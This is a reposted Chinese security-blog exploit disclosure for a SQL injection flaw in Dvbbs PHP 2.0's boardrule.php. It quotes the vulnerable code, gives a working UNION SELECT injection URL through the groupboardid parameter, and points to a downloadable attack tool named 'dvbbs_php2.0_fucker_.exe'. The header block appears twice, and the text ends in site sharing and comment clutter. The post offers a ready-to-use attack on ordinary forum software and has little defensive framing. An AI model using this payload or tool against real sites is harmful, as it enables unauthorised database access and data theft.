dvbbs之PHP版本0day 's

admin 2017年4月29日19:55:11评论338 views字数 695阅读2分19秒阅读模式
摘要

————————————-
注:本站首发,转载请保留,谢谢!
http://www.huaidan.org
鬼仔's Blog
————————————-
影响版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息来源:零客网安 www.0kee.com

————————————-
注:本站首发,转载请保留,谢谢!
http://www.huaidan.org
鬼仔's Blog
————————————-
影响版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息来源:零客网安 www.0kee.com

Dvbbs PHP 0day

相关代码:

function brule() {
  global $dv,$db,$boardid,$lang,$groupboardid;
  $groupboardid=$_GET['groupboardid'];
  if(!empty($_GET['groupboardid'])){
    $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");  
  }
  else{
    $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");  
  }

直接获得变量groupboardid,不为空就直接带入查询导致注入。

测试:http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*

利用工具 dvbbs_php2.0_fucker_.exe MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
dvbbs_php2.0_fucker_.rar

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月29日19:55:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   dvbbs之PHP版本0day 'shttps://cn-sec.com/archives/47542.html

发表评论

匿名网友 填写信息